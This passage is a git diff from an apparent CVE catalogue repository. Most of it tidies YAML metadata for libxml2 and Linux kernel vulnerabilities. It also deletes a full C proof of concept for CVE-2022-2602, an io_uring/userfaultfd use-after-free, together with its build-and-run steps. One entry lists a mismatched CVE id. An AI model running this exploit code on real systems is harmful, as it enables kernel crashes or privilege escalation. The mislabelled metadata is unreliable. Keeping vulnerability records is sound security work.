+6,7 @@ info: description: | libxml2 中xinclude.c存在资源管理错误漏洞,该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管理不当。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3518 classification: diff --git a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml index f2db176b..9302a380 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3537.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3537.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 存在代码问题漏洞,攻击者可利用该漏洞使应用程序崩溃。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3537 classification: diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml index 2442cf53..f22083e2 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4916 source: https://www.openwall.com/lists/oss-security/2011/11/05/3 info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: medium - description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4916 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml index 255ddd17..d4817b05 100644 --- a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml @@ -1,18 +1,18 @@ id: CVE-2011-4917 source: https://www.openwall.com/lists/oss-security/2011/11/07/9 info: - name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 - severity: medium - description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 - scope-of-influence: - Linux kernel <= 3.1 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2011-4917 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2011-4917 - cwe-id: CWE-200 - cnvd-id: None - kve-id: None - tags: information disclosure \ No newline at end of file + name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。 + severity: medium + description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2011-4917 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4917 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml index 797969a3..40cfccc8 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-13272.yaml @@ -37,6 +37,7 @@ info: - https://usn.ubuntu.com/4117-1/ - https://usn.ubuntu.com/4118-1/ - https://www.debian.org/security/2019/dsa-4484 + classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2019-13272 diff --git a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml index 6a480aa9..c8a242be 100644 --- a/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml +++ b/cve/linux-kernel/2020/yaml/CVE-2020-12351.yaml @@ -2,7 +2,7 @@ id: CVE-2020-12351 source: https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access. scope-of-influence: diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml index 2be396cf..803cefb3 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-22555.yaml @@ -6,15 +6,17 @@ info: description: | Linux Netfilter模块在实现IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt时,存在堆越界写入漏洞。该漏洞将允许本地用户通过用户名空间获取权限提升,在kCTF中被用于攻击Kubernetes Pod容器,实现容器逃逸。该漏洞已在Linux内核代码中存在15年。 scope-of-influence: - v2.6.19-rc1~v5.12-rc7 + v2.6.19-rc1 ≤ Linux-Kernel ≤ v5.12-rc7 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2021-22555 - https://nvd.nist.gov/vuln/detail/CVE-2021-22555 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=9fa492cdc160cd27ce1046cb36f47d3b2b1efa21 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-787 - tags: cve2021,权限提升,容器逃逸 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升, 容器逃逸 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml index e4014448..3355d61c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-26708.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/cve-2021-26708 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26708 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.0 cve-id: CVE-2021-26708 cwe-id: CWE-667 + cnvd-id: None + kve-id: None tags: 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml index 4c330eb4..1047549c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-29155.yaml @@ -11,7 +11,7 @@ info: - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PAEQ3H6HKNO6KUCGRZVYSFSAGEUX23JL/ - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CUX2CA63453G34C6KYVBLJXJXEARZI2X/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-29155 cwe-id: CWE-125 diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml index bdb280f2..e4d4734c 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33624.yaml @@ -5,11 +5,9 @@ info: severity: medium description: | 在Linux内核的kernel/bpf/verifier.c 中,可以预测一个分支(例如,因为类型的混淆),因此一个非特权BPF程序可以通过边信道攻击读取任意内存位置,又名CID-9183671af6db。 - scope-of-influence: Red Hat Enterprise Linux 8 - Linux kernel before 5.12.13 - + Linux kernel < 5.12.13 reference: - https://access.redhat.com/security/cve/CVE-2021-33624 - https://ubuntu.com/security/CVE-2021-33624 @@ -17,7 +15,6 @@ info: - https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html - https://github.com/torvalds/linux/commit/9183671af6dbf60a1219371d4ed73e23f43b49db - http://www.openwall.com/lists/oss-security/2021/06/21/1 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.7 @@ -25,5 +22,4 @@ info: cwe-id: CWE-203 cnvd-id: None kve-id: None - tags: 内存泄露, 侧信道攻击 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml index f58af1c4..efe2294b 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-33909.yaml @@ -15,4 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-22555 cwe-id: CWE-120 - tags: cve2021,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml index ade74c39..82972aa0 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml @@ -11,13 +11,15 @@ info: Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM - (Linux-kernel < 5.11) + Linux-kernel < 5.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3493 - https://ubuntu.com/security/notices/USN-4917-1 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2021-3493 - cwe-id: CWE-269, CEW-270 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-269, CWE-270 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b53..05ed7647 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml @@ -17,4 +17,6 @@ info: cvss-score: 8.8 cve-id: CVE-2021-4154 cwe-id: CWE-416 + cnvd-id: None + kve-id: None tags: cve2021, 内存错误引用 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml index e34d9dd1..92ccf20a 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml @@ -6,7 +6,7 @@ info: description: | The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access scope-of-influence: - Linux 2.1.94~v5.13.12 + Linux 2.1.94 < Linux-Kernel < v5.13.12 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42008 - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13 @@ -16,6 +16,6 @@ info: cvss-score: 7.8 cve-id: CVE-2021-42008 cwe-id: CWE-787 - cnvd-id: - kve-id: + cnvd-id: None + kve-id: None tags: 协议解码溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml index af36da21..004b603d 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4204.yaml @@ -11,8 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-4204 - https://www.openwall.com/lists/oss-security/2022/01/11/4 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H cvss-score: 7.1 cve-id: CVE-2021-4204 - cwe-id: CWE-787, CEW-20 - tags: cve2021,权限提升 \ No newline at end of file + cwe-id: CWE-787, CWE-20 + cnvd-id: None + kve-id: None + tags: cve2021, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml index 883f6652..ad6af5fd 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml @@ -5,13 +5,10 @@ info: severity: medium description: | Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。 - scope-of-influence: - Linux kernel before 5.14.14 - + Linux kernel < 5.14.14 reference: - https://nvd.nist.gov/vuln/detail/cve-2021-42327 - classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 6.7 @@ -19,5 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: 缓冲区溢出 \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/README.md b/cve/linux-kernel/2022/CVE-2022-2602/README.md deleted file mode 100644 index ccaf80aa..00000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/README.md +++ /dev/null @@ -1,6 +0,0 @@ -### 漏洞复现 -```shell -$ gcc poc.c -o poc -$ chmod +x ./poc -$ ./poc -``` \ No newline at end of file diff --git a/cve/linux-kernel/2022/CVE-2022-2602/poc.c b/cve/linux-kernel/2022/CVE-2022-2602/poc.c deleted file mode 100644 index 89696fba..00000000 --- a/cve/linux-kernel/2022/CVE-2022-2602/poc.c +++ /dev/null @@ -1,174 +0,0 @@ -#define _GNU_SOURCE -#include -#include -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -static int userfaultfd(int flags) -{ - return syscall(__NR_userfaultfd, flags); -} - -static char buffer[4096]; -static void fault_manager(int ufd) -{ - struct uffd_msg msg; - struct uffdio_copy copy; - read(ufd, &msg, sizeof(msg)); - if (msg.event != UFFD_EVENT_PAGEFAULT) - err(1, "event not pagefault"); - copy.dst = msg.arg.pagefault.address; - copy.src = (long) buffer; - copy.len = 4096; - copy.mode = 0; - copy.copy = 0; - sleep(2); - ioctl(ufd, UFFDIO_COPY, ©); - close(ufd); -} - -static char *bogus; - -static void start_ufd(int ufd) -{ - struct uffdio_api api; - struct uffdio_register reg; - - bogus = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); - - api.api = UFFD_API; - api.features = 0; - api.ioctls = 0; - ioctl(ufd, UFFDIO_API, &api); - - reg.range.start = (long) bogus; - reg.range.len = 4096; - reg.mode = UFFDIO_REGISTER_MODE_MISSING; - reg.ioctls = 0; - - ioctl(ufd, UFFDIO_REGISTER, ®); -} - - -int sendfd(int s, int fd) -{ - struct msghdr msg; - char buf[4096]; - struct cmsghdr *cmsg; - int fds[1] = { fd }; - - memset(&msg, 0, sizeof(msg)); - memset(buf, 0, sizeof(buf)); - - msg.msg_control = buf; - msg.msg_controllen = sizeof(buf); - - cmsg = CMSG_FIRSTHDR(&msg); - cmsg->cmsg_level = SOL_SOCKET; - cmsg->cmsg_type = SCM_RIGHTS; - cmsg->cmsg_len = CMSG_LEN(sizeof(fds)); - memcpy(CMSG_DATA(cmsg), fds, sizeof(fds)); - - msg.msg_controllen = CMSG_SPACE(sizeof(fds)); - - sendmsg(s, &msg, 0); -} - -int io_uring_setup(int r, void *p) -{ - return syscall(__NR_io_uring_setup, r, p); -} - -int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig) -{ - return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig); -} - -int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args) -{ - return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args); -} - -int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring) -{ - struct io_uring_sqe *sqe; - io_uring_queue_mmap(fd, params, ring); - sqe = io_uring_get_sqe(ring); - sqe->opcode = IORING_OP_WRITEV; - sqe->fd = 1; - sqe->addr = (long) bogus; - sqe->len = 1; - sqe->flags = IOSQE_FIXED_FILE; -} - -int main(int argc, char **argv) -{ - int ufd; - pid_t manager; - - struct io_uring ring; - int fd; - struct io_uring_params *params; - int rfd[32]; - int s[2]; - int backup_fd; - - struct iovec *iov; - iov = (void *) buffer; - iov->iov_base = "hello, world!\n"; - iov->iov_len = 14; - - ufd = userfaultfd(0); - if (ufd < 0) - err(1, "userfaultfd"); - start_ufd(ufd); - - if ((manager = fork()) == 0) { - fault_manager(ufd); - exit(0); - } - close(ufd); - - socketpair(AF_UNIX, SOCK_DGRAM, 0, s); - - params = malloc(sizeof(*params)); - memset(params, 0, sizeof(*params)); - params->flags = IORING_SETUP_SQPOLL; - fd = io_uring_setup(32, params); - - rfd[0] = s[1]; - rfd[1] = open("null", O_RDWR | O_CREAT | O_TRUNC, 0644); - io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); - close(rfd[1]); - - sendfd(s[0], fd); - - close(s[0]); - close(s[1]); - - prepare_request(fd, params, &ring); - io_uring_submit(&ring); - - io_uring_queue_exit(&ring); - - sleep(1); - - close(socket(AF_UNIX, SOCK_DGRAM, 0)); - - wait(NULL); - wait(NULL); - - return 0; -} diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml index 4fa8b80c..0e6d5a3b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0185.yaml @@ -6,14 +6,16 @@ info: description: | Linux kernel 存在输入验证错误漏洞,该漏洞源于在 Linux kernel 的 Filesystem Context 中的 legacy_parse_param 函数验证提供的参数长度的方式中发现了一个基于堆的缓冲区溢出缺陷。 非特权(在启用非特权用户命名空间的情况下,否则需要命名空间的 CAP_SYS_ADMIN 特权)本地用户能够打开不支持文件系统上下文 API 的文件系统(因此回退到遗留处理)可以使用此缺陷来提升他们在系统上的权限。 scope-of-influence: - 5.1-rc1~5.16.2 + 5.1-rc1 ≤ Linux-Kernel ≤ 5.16.2 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0185 - https://nvd.nist.gov/vuln/detail/CVE-2022-0185 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.4 cve-id: CVE-2022-0185 cwe-id: CWE-190 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml index 64fbf4c3..6ddbf77b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0435 -source: - https://github.com/wlswotmd/CVE-2022-0435 +source: https://github.com/wlswotmd/CVE-2022-0435 info: name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用. severity: high diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml index 6d5a4c48..8e938907 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0492.yaml @@ -2,18 +2,20 @@ id: CVE-2022-0492 source: https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 + severity: High description: | A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly. scope-of-influence: - 2.6.24-rc1~5.17-rc3 + 2.6.24-rc1 ≤ Linux-Kernel ≤ 5.17-rc3 reference: - http://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-0492 - https://nvd.nist.gov/vuln/detail/CVE-2022-0492 - https://git.kernel.org/linus/24f6008564183aa120d07c03d9289519c2fe02af classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0492 cwe-id: CWE-287 - tags: 权限提升,容器逃逸,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 权限提升, 容器逃逸, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml index b5a28492..04f3fdc4 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0847.yaml @@ -12,7 +12,7 @@ info: - https://bugzilla.redhat.com/show_bug.cgi?id=2060795 - https://security.netapp.com/advisory/ntap-20220325-0005/ classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0847 cwe-id: CWE-665, CWE-281 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml index 6cbe8968..14847983 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-0995.yaml @@ -15,6 +15,6 @@ info: cvss-score: 7.8 cve-id: CVE-2022-0995 cwe-id: CWE-787 - cnvd-id: - kve-id: - tags: 内核越界,权限提升,cve2022 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: 内核越界, 权限提升, cve2022 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml index d4339dfc..0fa3364c 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1015.yaml @@ -2,17 +2,19 @@ id: CVE-2022-1015 source: https://github.com/pqlx/CVE-2022-1015 info: name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: high + severity: Medium description: | 在netfilter子系统的linux/net/netfilter/nf_tables_api.c中发现了Linux内核的一个缺陷。此漏洞允许本地用户导致越界写入问题。 scope-of-influence: - 5.12 ≤ kernel < 5.17 + 5.12 ≤ Linux-Kernel < 5.17 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1015 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e1acfa387b9ff82cfc7db8cc3b6959221a95851 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H cvss-score: 6.6 cve-id: CVE-2022-1015 cwe-id: CWE-787 - tags: cve2022,权限提升 \ No newline at end of file + cnvd-id: None + kve-id: None + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml index d07729f3..7c50227b 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-1679.yaml @@ -16,4 +16,5 @@ info: cve-id: CVE-2022-1679 cwe-id: CWE-416 cnvd-id: None + kve-id: None tags: 权限提升, cve2022 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml index dec1b6bf..461d2912 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-23222.yaml @@ -6,7 +6,7 @@ info: description: | 由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限 scope-of-influence: - Linux kernel(>=5.8 && <=5.16) + 5.8 ≤ Linux kernel ≤ 5.16 reference: - https://www.openwall.com/lists/oss-security/2022/06/04/3 - https://security.netapp.com/advisory/ntap-20220217-0002/ @@ -17,4 +17,4 @@ info: cwe-id: CWE-476 cnvd-id: None kve-id: None - tags: cve2022,权限提升 \ No newline at end of file + tags: cve2022, 权限提升 \ No newline at end of file diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml index de53968b..7ac52ce3 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-24122.yaml @@ -6,7 +6,7 @@ info: description: | 由于Linux kernel中存在资源管理错误漏洞,当kernel/ucount.c(非特权时)启用非特权用户命名空间时,允许释放后继续使用和特权升级,因为ucounts对象的寿命可以比其命名空间长。 scope-of-influence: - Linux kernel(>=5.14 && <=5.16.4) + 5.14 ≤ Linux kernel ≤ 5.16.4 reference: - https://ubuntu.com/security/CVE-2022-24122 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24122 diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml index 75f50892..6fc8ac15 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25258.yaml @@ -1,6 +1,5 @@ id: CVE-2022-25258 -source: - https://github.com/szymonh/d-os-descriptor +source: https://github.com/szymonh/d-os-descriptor info: name: Linux kernel是Linux操作系统的主要组件,也是计算机硬件与其进程之间的核心接口。它负责两者之间的通信,还要尽可能高效地管理资源。Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用。 severity: medium diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml index d64f2726..5c7a3abc 100644 --- a/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-25265.yaml @@ -10,10 +10,10 @@ info: reference: - https://nvd.nist.gov/vuln/detail/cve-2022-25265 classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: 